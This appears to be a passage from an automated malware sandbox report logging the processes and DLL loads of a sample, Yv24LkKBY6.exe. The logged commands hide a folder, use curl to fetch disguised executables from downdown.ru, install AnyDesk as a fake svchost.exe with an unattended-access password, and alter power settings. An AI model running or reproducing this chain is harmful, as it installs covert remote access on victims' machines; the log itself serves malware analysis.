    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\System32\attrib.exe" +s +h C:\IntelJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnkJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\driver.exe C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /yJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\Trays\Trays.exe "C:\Intel\Trays\Trays.exe" -trayJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\svchost.exe svchost.exe --install C:\Intel\AnyDeskJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" "Jump to behavior
    Source: C:\Intel\Trays\Trays.exeProcess created: C:\Intel\Trays\4t-min64.exe "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll"
    Source: C:\Intel\svchost.exeProcess created: C:\Intel\svchost.exe "C:\Intel\svchost.exe" --local-service
    Source: C:\Intel\svchost.exeProcess created: C:\Intel\svchost.exe "C:\Intel\svchost.exe" --local-control
    Source: C:\Intel\AnyDesk\AnyDesk.exeProcess created: C:\Intel\AnyDesk\AnyDesk.exe "C:\Intel\AnyDesk\AnyDesk.exe" --crash-handler
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\AnyDesk\AnyDesk.exe AnyDesk.exe --set-password _unattended_access
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\dc.exe C:\Intel\dc.exe /D
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -h off
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Intel\dc.exe "C:\Intel\dc.exe" /SYS 1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: msftedit.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: windows.globalization.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: globinputhost.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dll
    Source: C:\Intel\curl.exeSection loaded: secur32.dll
    Source: C:\Intel\curl.exeSection loaded: sspicli.dll
    Source: C:\Intel\curl.exeSection loaded: mswsock.dll
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dll
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Intel\curl.exeSection loaded: edgegdi.dll
    Source: C:\Intel\curl.exeSection loaded: secur32.dll
    Source: C:\Intel\curl.exeSection loaded: sspicli.dll
    Source: C:\Intel\curl.exeSection loaded: mswsock.dll
    Source: C:\Intel\curl.exeSection loaded: dnsapi.dll
    Source: C:\Intel\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Intel\driver.exeSection loaded: apphelp.dll
    Source: C:\Intel\driver.exeSection loaded: edgegdi.dll
    Source: C:\Intel\driver.exeSection loaded: windows.storage.dll
    Source: C:\Intel\driver.exeSection loaded: wldp.dll
    Source: C:\Intel\driver.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\driver.exeSection loaded: uxtheme.dll
    Source: C:\Intel\driver.exeSection loaded: propsys.dll
    Source: C:\Intel\driver.exeSection loaded: profapi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: version.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: wininet.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: edgegdi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: uxtheme.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: windows.storage.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: wldp.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: textshaping.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: dwmapi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: apphelp.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: iertutil.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: sspicli.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: profapi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: winhttp.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: mswsock.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: winnsi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: urlmon.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: srvcli.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: netutils.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: dnsapi.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: fwpuclnt.dll
    Source: C:\Intel\Trays\Trays.exeSection loaded: explorerframe.dll
    Source: C:\Intel\svchost.exeSection loaded: apphelp.dll
    Source: C:\Intel\svchost.exeSection loaded: winmm.dll
    Source: C:\Intel\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Intel\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\svchost.exeSection loaded: winhttp.dll
    Source: C:\Intel\svchost.exeSection loaded: secur32.dll
    Source: C:\Intel\svchost.exeSection loaded: sspicli.dll
    Source: C:\Intel\svchost.exeSection loaded: msimg32.dll
    Source: C:\Intel\svchost.exeSection loaded: usp10.dll
    Source: C:\Intel\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\svchost.exeSection loaded: uxtheme.dll
    Source: C:\Intel\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Intel\svchost.exeSection loaded: wldp.dll
    Source: C:\Intel\svchost.exeSection loaded: profapi.dll
    Source: C:\Intel\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Intel\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Intel\svchost.exeSection loaded: sxs.dll
    Source: C:\Intel\svchost.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Intel\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Intel\svchost.exeSection loaded: msasn1.dll
    Source: C:\Intel\Trays\4t-min64.exeSection loaded: apphelp.dll
    Source: C:\Intel\Trays\4t-min64.exeSection loaded: version.dll
    Source: C:\Intel\Trays\4t-min64.exeSection loaded: edgegdi.dll
    Source: C:\Intel\Trays\4t-min64.exeSection loaded: uxtheme.dll
    Source: C:\Intel\svchost.exeSection loaded: winmm.dll
    Source: C:\Intel\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Intel\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\svchost.exeSection loaded: winhttp.dll
    Source: C:\Intel\svchost.exeSection loaded: secur32.dll
    Source: C:\Intel\svchost.exeSection loaded: sspicli.dll
    Source: C:\Intel\svchost.exeSection loaded: msimg32.dll
    Source: C:\Intel\svchost.exeSection loaded: usp10.dll
    Source: C:\Intel\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\svchost.exeSection loaded: uxtheme.dll
    Source: C:\Intel\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Intel\svchost.exeSection loaded: wldp.dll
    Source: C:\Intel\svchost.exeSection loaded: profapi.dll
    Source: C:\Intel\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Intel\svchost.exeSection loaded: firewallapi.dll
    Source: C:\Intel\svchost.exeSection loaded: dnsapi.dll
    Source: C:\Intel\svchost.exeSection loaded: fwbase.dll
    Source: C:\Intel\svchost.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Intel\svchost.exeSection loaded: cryptsp.dll
    Source: C:\Intel\svchost.exeSection loaded: rsaenh.dll
    Source: C:\Intel\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Intel\svchost.exeSection loaded: netapi32.dll
    Source: C:\Intel\svchost.exeSection loaded: netutils.dll
    Source: C:\Intel\svchost.exeSection loaded: wkscli.dll
    Source: C:\Intel\svchost.exeSection loaded: srvcli.dll
    Source: C:\Intel\svchost.exeSection loaded: netprofm.dll
    Source: C:\Intel\svchost.exeSection loaded: npmproxy.dll
    Source: C:\Intel\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Intel\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Intel\svchost.exeSection loaded: mswsock.dll
    Source: C:\Intel\svchost.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\svchost.exeSection loaded: fwpuclnt.dll
    Source: C:\Intel\svchost.exeSection loaded: msasn1.dll
    Source: C:\Intel\svchost.exeSection loaded: winmm.dll
    Source: C:\Intel\svchost.exeSection loaded: edgegdi.dll
    Source: C:\Intel\svchost.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\svchost.exeSection loaded: winhttp.dll
    Source: C:\Intel\svchost.exeSection loaded: secur32.dll
    Source: C:\Intel\svchost.exeSection loaded: sspicli.dll
    Source: C:\Intel\svchost.exeSection loaded: msimg32.dll
    Source: C:\Intel\svchost.exeSection loaded: usp10.dll
    Source: C:\Intel\svchost.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\svchost.exeSection loaded: uxtheme.dll
    Source: C:\Intel\svchost.exeSection loaded: windows.storage.dll
    Source: C:\Intel\svchost.exeSection loaded: wldp.dll
    Source: C:\Intel\svchost.exeSection loaded: profapi.dll
    Source: C:\Intel\svchost.exeSection loaded: ntmarta.dll
    Source: C:\Intel\svchost.exeSection loaded: windowscodecs.dll
    Source: C:\Intel\svchost.exeSection loaded: thumbcache.dll
    Source: C:\Intel\svchost.exeSection loaded: policymanager.dll
    Source: C:\Intel\svchost.exeSection loaded: msvcp110_win.dll
    Source: C:\Intel\svchost.exeSection loaded: wtsapi32.dll
    Source: C:\Intel\svchost.exeSection loaded: dpapi.dll
    Source: C:\Intel\svchost.exeSection loaded: cryptbase.dll
    Source: C:\Intel\svchost.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Intel\svchost.exeSection loaded: dhcpcsvc.dll
    Source: C:\Intel\svchost.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Intel\svchost.exeSection loaded: msasn1.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: apphelp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winmm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: edgegdi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: iphlpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winhttp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: secur32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: sspicli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: msimg32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: usp10.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: kernel.appcore.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: windows.storage.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wldp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: profapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: ntmarta.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: firewallapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dnsapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: fwbase.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptsp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: rsaenh.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: cryptbase.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: netapi32.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: netutils.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wkscli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: srvcli.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: netprofm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: npmproxy.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: mswsock.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: napinsp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: pnrpnsp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: wshbth.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: dhcpcsvc.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: nlaapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winrnr.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: fwpuclnt.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: rasadhlp.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: hnetcfg.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: atl.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: userenv.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: gpapi.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: winmm.dll
    Source: C:\Intel\AnyDesk\AnyDesk.exeSection loaded: edgegdi.dll
